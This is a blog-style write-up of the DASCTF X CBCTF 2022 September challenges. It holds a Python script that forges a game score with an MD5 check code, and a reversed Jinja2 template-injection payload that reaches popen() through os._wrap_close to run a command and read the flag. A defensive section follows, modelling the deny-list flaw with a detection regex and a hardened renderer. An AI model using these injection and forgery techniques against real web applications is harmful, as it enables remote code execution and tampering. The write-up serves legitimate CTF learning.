DASCTF X CBCTF 2022 September Challenge
Midterms are over and I have a bit of time, so I'm doing a few challenges to get back into practice. Discussion welcome.
dino3D
Auditing the source
Found the part that sends the score request:
import requests
from hashlib import md5
import time

target = "http://node4.buuoj.cn:29625/check.php"
headers = {
    "Content-type": "application/x-www-form-urlencoded; charset=UTF-8"
}
# checkCode is md5(score + constant salt), exactly as the game's own request code builds it
body = {
    "score": "10000000",
    "checkCode": md5("10000000DASxCBCTF_wElc03e".encode()).hexdigest(),
    "tm": str(time.time())[:10],  # 10-digit Unix timestamp
}
res = requests.post(target, headers=headers, data=body)
print(res.text)
Got the flag.
Text Reverser
Both {{}} and its reversed form }}{{ are banned, but the check does not seem to be applied to the string after the app reverses it, so SSTI is wide open.
Look for a class we can use:
import requests
from bs4 import BeautifulSoup
import re

# classes whose __init__.__globals__ are commonly searched for eval / popen
evalC = ["warnings.catch_warnings", "WarningMessage", "codecs.IncrementalEncoder",
         "codecs.IncrementalDecoder", "codecs.StreamReaderWriter", "os._wrap_close",
         "reprlib.Repr", "weakref.finalize"]
popenC = ["os._AddedDllDirectory", "os._wrap_close"]
target = "http://ad4abcf2-c3cc-4f81-a64c-2c75f15429d8.node4.buuoj.cn:81/"
# the app reverses the text before rendering it, so the payload is sent reversed
rce = '{% print "".__class__.__bases__[0].__subclasses__()%}'
rce = rce[::-1]
body = {
    "text": rce,
}
res = requests.post(target, data=body)
q = BeautifulSoup(res.content, "lxml")
classes = str(q.p)
# strip the <p> wrapper, HTML entities and the "class '...'" decoration
classes = re.sub("'", "", re.sub(" class ", "", re.sub(
    "&...", "", re.sub("<p>.........", "", re.sub("]</p>", "", classes)))))
classlist = classes.split(",")
index = 0
print(classlist)
# print the position of every class that exposes popen through its globals
for i in classlist:
    if i in popenC:
        print(index, i)
    index += 1
Found os._wrap_close, whose globals expose popen().
Reverse the payload below and the flag comes out:
{% print "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('nl /flag').read()%}
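The root cause of the Text Reverser bypass, modelled from the defender's side. This is an added example and not the challenge's code (which is not on the page): it assumes a Flask/Jinja2 app that rejects '{{' and '}}' in the raw input, reverses the text, and renders the reversed string with render_template_string(). The deny-list runs on the wrong representation and never covers {% %} tags; the hardened variant never parses user text as a template at all.

```python
import re
from html import escape

# Assumed deny-list: catches '{{' / '}}' (and the reversed pair) but not '{% %}'.
BLOCKED_SUBSTRINGS = ("{{", "}}")

# All Jinja2 delimiters, so switching from {{ }} to {% %} or {# #} is no escape.
JINJA_DELIMITER = re.compile(r"\{[{%#]|[}%#]\}")


def reverse_text(text: str) -> str:
    """The app's transform: reverse the submitted string."""
    return text[::-1]


def passes_deny_list(text: str) -> bool:
    """True when the raw input contains none of the blocked substrings."""
    return not any(b in text for b in BLOCKED_SUBSTRINGS)


def vulnerable_prepare(user_text: str):
    """Assumed vulnerable flow: check the raw input, then reverse it.

    Returns the string the app would hand to the template engine, or None if
    the deny-list rejected the input. The engine only ever sees the reversed
    form, so the check inspects a representation that is never rendered.
    """
    if not passes_deny_list(user_text):
        return None
    return reverse_text(user_text)


def has_template_syntax(s: str) -> bool:
    """Detection: does a string contain any Jinja2 delimiter?"""
    return JINJA_DELIMITER.search(s) is not None


def audit(user_text: str) -> dict:
    """Check both the raw input and the form the engine would actually parse."""
    return {
        "raw": has_template_syntax(user_text),
        "rendered_form": has_template_syntax(reverse_text(user_text)),
    }


def hardened_render(user_text: str) -> str:
    """Hardened flow: fixed markup, reversed text inserted as escaped data.

    No user-controlled string is parsed as a template, so delimiters are just text.
    """
    return "<p>{}</p>".format(escape(reverse_text(user_text)))
```

Run audit() on a reversed probe such as "}% 7*7 tnirp %{" (a constructed, harmless tag): the raw form contains no complete delimiter, but the reversed form that reaches the engine does.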
zzz_again
I stared at it all night and my head is about to explode; what a twisted code audit.
Source: https://www.cnblogs.com/ccuu/p/16869281.html